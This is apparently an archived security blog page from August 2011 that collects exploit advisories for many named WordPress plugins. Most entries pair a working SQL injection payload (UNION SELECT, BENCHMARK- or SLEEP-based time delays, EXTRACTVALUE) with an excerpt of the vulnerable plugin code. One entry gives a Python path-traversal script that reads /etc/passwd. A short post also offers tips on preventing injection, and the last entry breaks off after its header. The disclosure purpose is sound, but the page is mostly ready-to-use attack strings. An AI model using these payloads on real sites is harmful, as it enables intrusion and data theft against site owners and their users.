Paths of an uncon(s)cious mind: August 2011

Wednesday, August 31, 2011

WordPress Couponer plugin <= 1.2 SQL Injection Vulnerability

# Exploit Title: WordPress Couponer plugin <= 1.2 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/couponer.zip
# Version: 1.2 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/couponer/print-coupon.php?ID=-1' UNION AL
L SELECT 1,version(),database(),current_user(),5,6,7,8,9,10--%20

---------------
Vulnerable code
---------------
$ID = $_GET['ID'];
...
$sql_get_coupon_id = "SELECT *, DATE_FORMAT(Expires, '%b %e, %Y') as Expires, DA
TE_FORMAT(Created, '%b %e, %Y') as Created FROM wp_couponer WHERE ID='$ID'";
$result_get_coupon_id = mysql_query($sql_get_coupon_id);

p.s. author has been contacted (no reply yet)

WordPress PureHTML plugin <= 1.0.0 SQL Injection Vulnerability

# Exploit Title: WordPress PureHTML plugin <= 1.0.0 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip
# Version: 1.0.0 (tested)
# Note: magic_quotes has to be turned off

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/pure-html/alter.php
 PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(11
5,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(!isset($_POST['PureHTMLNOnce'])){
    if ( !wp_verify_nonce( $_POST['PureHTMLNOnce'], plugin_basename(__FILE__) ))
 {header("location:".$refer);}
}
else{
    ...
    if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
    ...
    $action = $_POST['action'];
    
    #delete
    if($action == "delete"){
        $sql = "delete from ".$wpdb->prefix."pureHTML_functions WHERE id='".$id.
"'";
        $wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)

p.s. author has been contacted (no reply yet)

WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerability

# Exploit Title: WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerabi
lity
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip
# Version: 1.1.4 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php
 page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),cur
rent_user()),NULL--%20&batch_size=-1

---------------
Vulnerable code
---------------
$post_type_in = array();

if( isset( $_POST['page'] ) )
{
    $post_type_in[] = '"page"';
}
if( isset( $_POST['post'] ) )
{
    $post_type_in[] = '"post"';
}
$post_type_in = '(' . implode(',', $post_type_in) . ')';
$id_from = $_POST['from_id'];
$batch_size = $_POST['batch_size'];

$post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->pos
ts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from 
order by ID asc LIMIT $batch_size" ) ); //misusage of $wpdb->prepare() :)

p.s. author has been contacted (will fix it)
p.p.s. for proper usage of $wpdb->prepare() you can take a look here

Tuesday, August 30, 2011

WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection Vulnerability

# Exploit Title: WordPress wp audio gallery playlist plugin <= 0.12 SQL Injectio
n Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist
.0.12.zip
# Version: 0.12 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?po
st_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12
,13,14,15,16,17,18,version(),20,21,22,23--%20

---------------
Vulnerable code
---------------
$table_name = $wpdb->prefix . "posts";
...
if (isset($_GET['post_gallery']))
    $query = 'SELECT * FROM `'.$table_name.'` WHERE `post_parent` = \''.$_GET['p
ost_gallery'].'\' AND  `post_mime_type` = \'audio/mpeg\' ORDER BY `menu_order` A
SC';

p.s. author has been contacted (no reply yet)

WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability

# Exploit Title: WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vuln
erability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zi
p
# Version: 2.0.2 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.p
hp?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(
58)))--%20

---------------
Vulnerable code
---------------
class b3_chartData extends b3_sbTrackingConfig
{
    public function tracking_bot_report_chart_data()
    {
        ...
        if($_GET['page_url'] != '')
        {
            $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_t
ime`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table W
HERE `visit_time` >= '$start' AND `visit_time` <= '$end' AND `page_url` = '" . $
_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`");
            ...

if ($_GET['chart_data']==1) {
    ...
    $chartData = new b3_chartData();
    echo $chartData->tracking_bot_report_chart_data();

p.s. author has been contacted (will fix it)

WordPress Event Registration plugin <= 5.4.3 SQL Injection Vulnerability

# Exploit Title: WordPress Event Registration plugin <= 5.4.3 SQL Injection Vuln
erability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.z
ip
# Version: 5.4.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/event-registration/event_registration_exp
ort.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112)))
,0)--%20

---------------
Vulnerable code
---------------
$id= $_REQUEST['id'];
...
$sql  = "SELECT * FROM " . $events_detail_tbl . " WHERE id='$id'";
$result = mysql_query($sql);

p.s. author has been contacted (no reply yet)

WordPress Advertizer plugin <= 1.0 SQL Injection Vulnerability

# Exploit Title: WordPress Advertizer plugin <= 1.0 SQL Injection Vulnerability
# Date: 2011-08-29
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/advertizer.1.0.zip
# Version: 1.0 (tested)
# Note: magic_quotes has to be turned off

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/advertizer/click_ads.php
 id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%2
0

---------------
Vulnerable code
---------------
$res = $wpdb->get_row("SELECT `limit_clicks`, `trace_clicks` FROM `".$wpdb->pref
ix."adv_v_base` WHERE `id` = '".$_POST[id]."' limit 1;");

p.s. author has not been contacted (no usable contact information about the author)

Monday, August 29, 2011

WordPress SH Slideshow plugin <= 3.1.4 SQL Injection Vulnerability

# Exploit Title: WordPress SH Slideshow plugin <= 3.1.4 SQL Injection Vulnerabil
ity
# Date: 2011-08-29
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/sh-slideshow.3.1.4.zip
# Version: 3.1.4 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/sh-slideshow/ajax.php
 id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$result = $wpdb->query('delete from sh_slides where id = '.$_POST['id']);

p.s. can't contact author as there is no contact information available (samhoamt)

WordPress iCopyright(R) Article Tools plugin <= 1.1.4 SQL Injection Vulnerability

# Exploit Title: WordPress iCopyright(R) Article Tools plugin <= 1.1.4 SQL Injec
tion Vulnerability
# Date: 2011-08-29
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/copyright-licensing-tools
.zip
# Version: 1.1.4 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/copyright-licensing-tools/icopyright_xml.
php?id=1' AND 1=1--%20

---------------
Vulnerable code
---------------
$icopyright_post_id = $_GET['id']; //requested post id
...
$response = $wpdb->get_results("SELECT * FROM $posttable JOIN $usertable on $pos
ttable.post_author=$usertable.ID WHERE $posttable.ID = '$icopyright_post_id'");

p.s. author has been contacted (they'll fix it)

Sunday, August 28, 2011

WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability

# Exploit Title: WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vul
nerability
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/fbpromotions.1.3.3.zip
# Version: 1.3.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/fbpromotions/fbActivate.php?action=activa
te&name=test&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,1
12))),0)--%20

---------------
Vulnerable code
---------------
if($_REQUEST['action']=="activate"){
    $key = md5(get_option("key").$_REQUEST['name'].$_REQUEST['id']);
    ...
    $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key.
"' WHERE promo_id='".$_REQUEST['id']."'";

p.s. author has been contacted (no reply yet)

WordPress Evarisk plugin <= 5.1.3.6 SQL Injection Vulnerability

# Exploit Title: WordPress Evarisk plugin <= 5.1.3.6 SQL Injection Vulnerability
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/evarisk.5.1.3.6.zip
# Version: 5.1.3.6 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/evarisk/include/ajax.php?post=true&act=re
loadCombo&table=wp_eva__veille_groupe_question&nomRacine=-1" UNION ALL SELECT 1,
@@version,3,4,5,6,7--%20

---------------
Vulnerable code
---------------
if($_REQUEST['post'] == 'true')
{
    if(isset($_REQUEST['act']))
    {
        switch($_REQUEST['act'])
        {
            ...
            case 'reloadCombo':
                $racine = $wpdb->get_row( 'SELECT * FROM ' . TABLE_GROUPE_QUESTI
ON . ' where nom="' . $_REQUEST['nomRacine'] . '"');

p.s. author has been contacted (no reply yet)

WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability

# Exploit Title: WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerabilit
y
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/profiles.2.0.RC1.zip
# Version: 2.0 RC1 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/profiles/library/bio-img.php?id=-1' AND 1
=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$query = "SELECT * FROM ".$wpdb->prefix."bios WHERE id='$_GET[id]'";
...
$result = mysql_query($query);

p.s. author has been contacted (no reply yet)

WordPress mySTAT plugin <= 2.6 SQL Injection Vulnerability

# Exploit Title: WordPress mySTAT plugin <= 2.6 SQL Injection Vulnerability
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/mystat.2.6.zip
# Version: 2.6 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/mystat/mystat.php?act=stat_img&d1=1&d2=-1
') AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(isset($_GET['act'])){
    ...
    if ($_GET['act'] == 'stat_img') {
        myStat_stat_image();
        exit();
    };
};

function myStat_stat_image(){
    ...
    if(substr($_GET['d1'],0,10)!=substr($_GET['d2'],0,10)){
        $var=$cmn->getSQL("SELECT DATE_FORMAT(date,'%d-%m-%y'),count(*),sum(coun
t),TO_DAYS(date) FROM `%%PREFIX%%myStat_main` WHERE date > ('".$_GET['d1']."') A
ND date < ('".$_GET['d2']."') GROUP BY TO_DAYS(date) ORDER BY date DESC LIMIT 0,
30;");

p.s. won't contact Secunia as they aren't replying to my previous emails, can't contact author as there is no any contact information (KILLER)

Saturday, August 27, 2011

WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability

# Exploit Title: WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vu
lnerability
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/collision-testimonials.zi
p
# Version: 3.0 (tested)
# Note: user has to be logged in as "admin"

---
PoC
---
http://www.site.com/wp-admin/admin.php?page=testimonials&featQuote&id=-1 AND 1=I
F(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
if (isset($_GET['featQuote'])) {
    $id = $_GET['id'];
    mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id");
};

p.s. contacted Secunia (no reply), contacted author and he was quite rude saying that he'll just discontinue the plugin itself

WordPress oQey Headers plugin <= 0.3 SQL Injection Vulnerability

# Exploit Title: WordPress oQey Headers plugin <= 0.3 SQL Injection Vulnerabilit
y
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/oqey-headers.0.3.zip
# Version: 0.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/oqey-headers/oqey_settings.php?img_header
_id[]=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--
%20

---------------
Vulnerable code
---------------
if(isset($_GET['img_header_id'])){//order images
foreach ($_GET['img_header_id'] as $position => $item){
$h_update = sprintf("UPDATE $oqey_header SET oqey_h_order = '%d' WHERE oqey_h_id
 = '%s' ", $position,  $item
);
...

p.s. contacted Secunia (no reply), contacted author (fixed)

WordPress Js-appointment plugin <= 1.5 SQL Injection Vulnerability

# Exploit Title: WordPress Js-appointment plugin <= 1.5 SQL Injection Vulnerabil
ity
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/js-appointment.1.5.zip
# Version: 1.5 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/js-appointment/searchdata.php?search_acti
on=searchadv&cat=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,
112))),0)--%20

---------------
Vulnerable code
---------------
if (!empty($_REQUEST['search_action'])) {
    switch($_REQUEST['search_action']) {
        case 'searchadv':
    require_once(PLUGIN_PATH_ALLBOOK."/libs/class.book.php");
    $settings = allbook_get_settings();

    if ($_REQUEST["cat"]) {
    $category = $_REQUEST["cat"];
    } else {
    $settings = allbook_get_settings();
    $category = $settings['allbook_catinit'];
      }
    //$times = create_time_range($settings['allbook_datastart'], $settings['allb
ook_dataend'], $settings['allbook_datarange']);
   $categoryquery = mysql_query("SELECT * FROM wp_resservation_cat WHERE id= '".
$category."'");
   $rowcategory = mysql_fetch_array( $categoryquery );
...

p.s. contacted Secunia (no reply), contacted author (no reply)

WordPress Super CAPTCHA plugin <= 2.2.4 SQL Injection Vulnerability

# Exploit Title: WordPress Super CAPTCHA plugin <= 2.2.4 SQL Injection Vulnerabi
lity
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/super-capcha.2.2.4.zip
# Version: 2.2.4 (tested)
# Notes: user has to be logged in as "admin" and magic_quotes has to be turned o
ff

---
PoC
---
http://www.site.com/wp-admin/admin.php?page=super-captcha/Logs&markspam=-1' OR S
LEEP(5)--%20

---------------
Vulnerable code
---------------
if(isset($_REQUEST['markspam']))
{
    global $wpdb;
    $UIDs = explode(',', $_REQUEST['markspam']);
    echo('<h2>Accounts Flagged</h2>');
    for($i=0;$i<count($UIDs);$i++)
    {
        mysql_query("UPDATE `". $wpdb->users ."` SET `spam`='1' WHERE `ID`='". $UIDs[$i] ."'");
        mysql_query("UPDATE `". $wpdb->users ."` SET `user_status`='1' WHERE `ID`='". $UIDs[$i] ."'");
        echo('<em>USER ID: '. $UIDs[$i] .' marked as spammer.</em><br />');
    }
}

p.s. contacted Secunia (no reply), no known contact information about the author (leewells)

WordPress MM Forms Community plugin <= 1.2.3 SQL Injection Vulnerability

# Exploit Title: WordPress MM Forms Community plugin <= 1.2.3 SQL Injection Vuln
erability
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/mm-forms-community.zip
# Version: 1.2.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/mm-forms-community/includes/edit_details.
php?ID=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-
-%20

---------------
Vulnerable code
---------------
foreach ($_REQUEST as $key => $value){
    
    $SQL="UPDATE wp_contactform_submit_data SET value=".quoteString($value)." WH
ERE fk_form_joiner_id='".$_REQUEST['ID']."' AND form_key='".$key."'";
    mysql_query($SQL);
}

p.s. contacted Secunia yesterday (no reply), can't find any contact information about the author (tbelmans)

Monday, August 22, 2011

Making Web a safer place to be :)

Guess who is responsible for those updates? I'll give you a hint ;)

WordPress MM Duplicate plugin <= 1.2 SQL Injection Vulnerability

# Exploit Title: WordPress MM Duplicate plugin <= 1.2 SQL Injection Vulnerabilit
y
# Date: 2011-08-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/mm-duplicate.zip
# Version: 1.2 (tested)

---
PoC
---
http://www.site.com/index.php?duplicate=1&post=-1 AND 1=IF(2>1,BENCHMARK(5000000
,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
class mm_duplicate_pages_posts
{
    ...
    function mm_duplicate_pages_posts()
    {
        ...
        add_action('init', array(&$this, 'dup'));
        ...        
    }

    function dup()
    {
        if($_GET['duplicate'])
        {
            $id = $_GET['post'];
            $dup = new mm_duplicate();
            ...
            $dup->duplicate_post_page($id);
        }
    }
...
}

class mm_duplicate
{
    function duplicate_post_page($id)
    {
        ...
        $select = "select * from ".$wpdb->prefix."postmeta where post_id = $id";
        ...
    }
...
}

p.s. author has been contacted (no reply yet)

Saturday, August 20, 2011

WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability

# Exploit Title: WordPress UnGallery plugin <= 1.5.8 Local File Discl
osure Vulnerability
# Date: 2011-08-20
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ungallery.1.5.8.zip
# Version: 1.5.8 (tested)

---
PoC
---
#!/bin/python

import urllib2

FILEPATH = "/etc/passwd"

req = urllib2.urlopen("http://www.site.com/wp-content/plugins/ungallery/source_v
uln.php?pic=../../../../../../../..%s" % FILEPATH)

print "Filepath: '%s'" % FILEPATH
print "Content: %s" % repr(req.read())

---------------
Vulnerable code
---------------
if ($_GET['pic']) {
    $filename = $_GET['pic'];
    $len = filesize($filename);
    $lastslash =  strrpos($filename, "/");
    $name =  substr($filename, $lastslash + 1);   

    header("Content-type: image/jpeg;\r\n");
    header("Content-Length: $len;\r\n");
    header("Content-Transfer-Encoding: binary;\r\n");
    header('Content-Disposition: inline; filename="'.$name.'"');    //  Render t
he photo inline.
    readfile($filename);
}

p.s. author has been contacted (no reply yet)

Best quick & dirty tip for preventing SQLi in Wordpress plugins

After a code review of lots of Wordpress plugins (here) best quick and dirty tip I could give to you (nothing new - lots of plugin writers already use this) if you are a Wordpress plugin writer and you are too stubborn to use prepared statements:

Enclose all parameter values inside self-crafted SQL queries with single quote marks (e.g. ...WHERE id='$id'...) - yes, this particularly means enclosing of integer-type parameter values (non-standard but effective against SQLi in WordPress)

Why? As stated here and as I've lately encountered many times in code reviews, get_magic_quotes_gpc is automatically turned on in Wordpress > v3.0 (e.g. $_GET = add_magic_quotes($_GET)). This simply means that breaking of quote enclosure ('...') into valid SQL form will be mission impossible for the attacker (except in some multi-byte character encodings like GBK - example). You are care-free to enclose integer values with single quotes because MySQL automatically casts string values to the required type (e.g. integer).

For example, simple transformation from (vulnerable):
... = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."plugin WHERE id=".$id)
to:
... = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."plugin WHERE id='".$id."'")
or just:
... = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."plugin WHERE id='$id'")
will make your plugin far safer from attackers (except if you are using "simplified Chinese" GBK character encoding at your Wordpress installation)

Also, non-SELECT commands (INSERT, UPDATE,...) are susceptible to SQL injection attacks, so this tips is usable for those too. I've seen few cases where it seemed to me that authors knowingly left those unprotected like nobody would be able to use those. Those are in worst case (!) time-based exploitable and keen attacker will use those for sure.

p.s. update: I've start disclosing those "careless" WP plugins too, so either you start using prepared SQL statements or do your filtering yourself

Thursday, August 18, 2011

WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability

# Exploit Title: WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerabil
ity
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-menu-creator.1.1.7.zip
# Version: 1.1.7 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/wp-menu-creator/updateSortOrder.php?menu_
id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
$menu_id = $_GET['menu_id'];
...
$first_item = $wpdb->get_row("SELECT * FROM " . $wpdb->prefix."menuitems WHERE `
order`=0 AND `parent`=0 AND menu = $menu_id");

p.s. author has been contacted (no reply yet)

WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability

# Exploit Title: WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL 
Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/allow-php-in-posts-and-pa
ges.zip
# Version: 2.0.0.RC1 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/allow-php-in-posts-and-pages/alter.php
 allowPHPNonce=-1&action=modify&function=-1&id=-1 AND 1=IF(2>1,BENCHMARK(5000000
,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
    if(!isset($_POST['allowPHPNonce'])){
        if ( !wp_verify_nonce( $_POST['allowPHPNonce'], plugin_basename(__FILE__
) )) {header("location:".$refer);}
    }
    else{
        if(!isset($_POST['action']) || !defined ('ABSPATH')){header("location:".
$refer);}
        if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
        if(isset($_POST['function'])){$function = $_POST['function'];}else{$func
tion="";}
        if(isset($_POST['name'])){$name = $_POST['name'];}else{$name="";}
        $action = $_POST['action'];

		#delete
        if($action == "delete"){

        ...

        elseif($action == "modify" && $function != ""){
            $sql = "update ".$wpdb->prefix."allowPHP_functions set function='".$
function."', name='".$name."' where id = ".$id;
            $results = $wpdb->get_results($wpdb->prepare($sql));

p.s. author has been contacted (no reply yet)

WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vulnerability

# Exploit Title: WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vul
nerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/global-content-blocks.1.2
.zip
# Version: 1.2 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/global-content-blocks/gcb/gcb_export.php?
gcb=1 AND 1=1

---------------
Vulnerable code
---------------
$ids = explode(";",$_GET["gcb"]);
$final_text = array();

foreach($ids as $id) {
    if(intval($id)>0) { // intval("1a") => 1 :)
        $entry = $wpdb->get_row("select * from ".$wpdb->prefix."gcb where id=".$
        id);

p.s. author has been contacted (fixed)

WordPress Ajax Gallery plugin <= 3.0 SQL Injection Vulnerability

# Exploit Title: WordPress Ajax Gallery plugin <= 3.0 SQL Injection Vulnerabilit
y
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ajaxgallery.3.0.zip
# Version: 3.0 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/ajaxgallery/utils/list.php?delete=1&gId=-
1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
if( isset( $_GET[ 'delete' ]) && isset( $_GET['gId'] ) ){
  $wpdb->query( "DELETE FROM $wpdb->options WHERE option_name='agItem' and optio
n_id=".$_GET['gId'] );
  echo "<div id='message' class='updated fade'><p><strong>Galeria eliminada</str
ong></p></div>";
}

p.s. can't find any contact information about author (sxceron)

WordPress WP Forum plugin <= 1.7.8 SQL Injection Vulnerability

# Exploit Title: WordPress WP Forum plugin <= 1.7.8 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wpforum.1.7.8.zip
# Version: 1.7.8 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/wpforum/sendmail.php?action=quote&id=-1 U
NION ALL SELECT @@version,2,3

---------------
Vulnerable code
---------------
...

else if(isset($_GET['action']) && $_GET['action'] == 'quote'){
	
	global $wpdb, $table_posts;
	$id = $_GET['id'];

	$text = $wpdb->get_row("SELECT text, author_id, date FROM $table_posts WHERE
 id = $id");
	$u = new WP_user($text->author_id);
	echo htmlentities("<blockquote>
<b>QUOTE</b> ($u->nickname @ ".date(get_optio
n('forum_date_format'), strtotime($text->date)).")\n $text->text</blockquote>
");

p.s. author has been contacted (no reply yet)

WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability

# Exploit Title: WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-ds-faq.1.3.2.zip
# Version: 1.3.2 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/wp-ds-faq/ajax.php
 action=delete_faqbook&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108
,109,97,112))),0)

---------------
Vulnerable code
---------------
switch($_POST['action']) {

    ...

    case 'delete_faqbook':
        if(!isset($_POST['id'])){ error(); }
        $id = $_POST['id'];

        ...

        $sql = "DELETE FROM `".$table_name."` WHERE `id` = ".$id;
        $results = $wpdb->query( $sql );

p.s. author has been contacted (will fix it)

Wednesday, August 17, 2011

WordPress OdiHost Newsletter plugin <= 1.0 SQL Injection Vulnerability

# Exploit Title: WordPress OdiHost Newsletter plugin <= 1.0 SQL Injection Vulne
rability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/odihost-newsletter-plugi
n.zip
# Version: 1.0 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/odihost-newsletter-plugin/includes/opens
tat.php?uid=-1&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97
,112))),0)

---------------
Vulnerable code
---------------
$newsletterid = $_GET["id"];

...
	
$wpdb->query("update newsletterstat set newsletterstatopened = CONCAT(newslette
rstatopened ,'". $subscriberid . ",') where newsletterstatnewsletterid= ". $new
sletterid);

p.s. author has been contacted (no reply yet)

WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection Vulnerability

# Exploit Title: WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection
 Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/easy-contact-form-lite.z
ip
# Version: 1.0.7 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/easy-contact-form-lite/requests/sort_row
.request.php
 field_num[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112)
)),0)

---------------
Vulnerable code
---------------
foreach ($_POST['field_num'] as $position=>$field_id) {
	
	if ($field_id > 0) {
		$query = "
			UPDATE $settings_table_name 
			SET position = '".$position."' 
			WHERE ID = $field_id";
		$wpdb->query($query);
	}

p.s. author has been contacted (no reply yet)

WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerability

# Exploit Title: WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerabili
ty
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-symposium.0.64.zip
